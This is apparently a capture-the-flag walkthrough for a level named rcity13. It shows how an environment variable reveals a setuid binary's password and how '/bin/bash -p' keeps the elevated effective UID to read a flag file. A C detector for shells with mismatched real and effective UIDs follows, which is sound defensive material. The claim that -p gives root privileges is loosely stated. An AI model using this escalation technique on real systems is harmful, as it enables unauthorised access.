Solution
rcity13@35e08a7255bf:~$ ls -al
total 48
drwxr-xr-x 1 root root 4096 Mar 6 08:04 .
drwxr-xr-x 1 root root 4096 Mar 6 08:03 ..
-rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 root root 3817 Mar 6 08:04 .bashrc
-rw-r--r-- 1 root root 807 Jan 6 2022 .profile
-r-sr-x--- 1 rcity14 rcity13 16448 Mar 6 08:04 rcity13-binary
rcity13@35e08a7255bf:~$ file rcity13-binary
rcity13-binary: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=949bfe04fad71f1663a147270f432b92da661d0d, for GNU/Linux 3.2.0, not stripped
Analyzing rcity13-binary shows that the setuid bit is set.
rcity13@35e08a7255bf:~$ ./rcity13-binary
[*] Usage: ./rcity13-binary <password> <command>
rcity13@35e08a7255bf:~$ ./rcity13-binary f2L9x6R5gH3q8C4s7Z0 ls
[*] Incorrect password. Exiting...
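So I ran it, and it told me to use the form <password> <command>. I entered the rcity13 password, but it said the password was incorrect. The challenge description says to look closely at the user's "environment" for the required password. So is it an environment variable??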
rcity13@35e08a7255bf:~$ export
declare -x HOME="/home/rcity13"
declare -x LANG="C.UTF-8"
declare -x LESSCLOSE="/usr/bin/lesspipe %s %s"
declare -x LESSOPEN="| /usr/bin/lesspipe %s"
declare -x LOGNAME="rcity13"
declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:"
declare -x MOTD_SHOWN="pam"
declare -x OLDPWD
declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin"
declare -x PWD="/home/rcity13"
declare -x README="research-setuid-its-important"
declare -x SHELL="/bin/bash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="203.229.62.101 61001 22"
declare -x SSH_CONNECTION="203.229.62.101 61001 172.17.0.2 22"
declare -x SSH_TTY="/dev/pts/2"
declare -x TERM="xterm-256color"
declare -x USER="rcity13"
If there is one thing that looks odd, it is README..? I should try entering what is written there as the password.
rcity13@35e08a7255bf:~$ echo $README
research-setuid-its-important
rcity13@35e08a7255bf:~$ ./rcity13-binary research-setuid-its-important "/bin/bash"
bash-5.1$ ls
rcity13-binary
bash-5.1$ ls -al
total 48
drwxr-xr-x 1 root root 4096 Mar 6 08:04 .
drwxr-xr-x 1 root root 4096 Mar 6 08:03 ..
-rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 root root 3817 Mar 6 08:04 .bashrc
-rw-r--r-- 1 root root 807 Jan 6 2022 .profile
-r-sr-x--- 1 rcity14 rcity13 16448 Mar 6 08:04 rcity13-binary
bash-5.1$ id
uid=1013(rcity13) gid=1013(rcity13) groups=1013(rcity13)
bash-5.1$
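The binary ran fine, but something is lacking. As far as I know, when setuid is set there should be an euid, but there is none.
To escalate privileges, use the -p option.
The -p option means privileged mode; this option is used to run bash with root privileges to perform specific tasks.
It is said to be used mostly for security-related tasks, and can be used when root privileges are needed.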
rcity13@35e08a7255bf:~$ ./rcity13-binary research-setuid-its-important "/bin/bash -p"
bash-5.1$ pwd
/home/rcity13
bash-5.1$ cd ..
bash-5.1$ cd rcity14
bash-5.1$ pwd
/home/rcity14
bash-5.1$ ls
rcity13-flag.txt
bash-5.1$ cat rcity13-flag.txt
p4Q7d3J2mS6w5H0r8G1bash-5.1$ id
uid=1013(rcity13) gid=1013(rcity13) euid=1014(rcity14) groups=1013(rcity13)
bash-5.1$
Flag obtained
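The two `id` outputs above differ because bash resets its effective UID to the real UID at startup unless `-p` is given, and the same difference is visible to a defender on the `Uid:` line of `/proc/<pid>/status`. The following is an added example, not part of the original write-up or the challenge binary: it parses that file's text and flags a shell whose effective UID differs from its real UID. The sample status text is constructed, and the list of shell names is an assumption.

```c
#include <stdio.h>
#include <string.h>

/* Order on the "Uid:" line of /proc/<pid>/status: real, effective, saved, fs. */
struct uids { unsigned real, eff, saved, fs; };

/* Parse status text; returns 0 and fills name/u, or -1 if a field is missing. */
int parse_status(const char *text, char *name, size_t name_len, struct uids *u)
{
    int have_name = 0, have_uid = 0;
    for (const char *line = text; line && *line; ) {
        char buf[64];
        if (strncmp(line, "Name:", 5) == 0 && sscanf(line + 5, " %63[^\n]", buf) == 1) {
            snprintf(name, name_len, "%s", buf);
            have_name = 1;
        } else if (strncmp(line, "Uid:", 4) == 0 &&
                   sscanf(line + 4, "%u %u %u %u", &u->real, &u->eff, &u->saved, &u->fs) == 4) {
            have_uid = 1;
        }
        line = strchr(line, '\n');   /* advance to the next line, if any */
        if (line) line++;
    }
    return (have_name && have_uid) ? 0 : -1;
}

/* 1 if the process is a shell whose effective UID differs from its real UID. */
int is_privileged_shell(const char *status_text)
{
    static const char *shells[] = { "bash", "sh", "dash", "zsh" };  /* assumed list */
    char name[64];
    struct uids u;
    if (parse_status(status_text, name, sizeof name, &u) != 0 || u.real == u.eff)
        return 0;
    for (size_t i = 0; i < sizeof shells / sizeof shells[0]; i++)
        if (strcmp(name, shells[i]) == 0) return 1;
    return 0;
}

/* Constructed samples modelled on the two sessions in this write-up. */
const char SAMPLE_DROPPED[] = "Name:\tbash\nUid:\t1013\t1013\t1013\t1013\n";
const char SAMPLE_KEPT[]    = "Name:\tbash\nUid:\t1013\t1014\t1014\t1014\n";

int main(void)
{
    printf("without -p: %d\n", is_privileged_shell(SAMPLE_DROPPED));
    printf("with -p:    %d\n", is_privileged_shell(SAMPLE_KEPT));
    return 0;
}
```

On a live system the same function can be fed the contents of each `/proc/<pid>/status` file instead of the constructed strings.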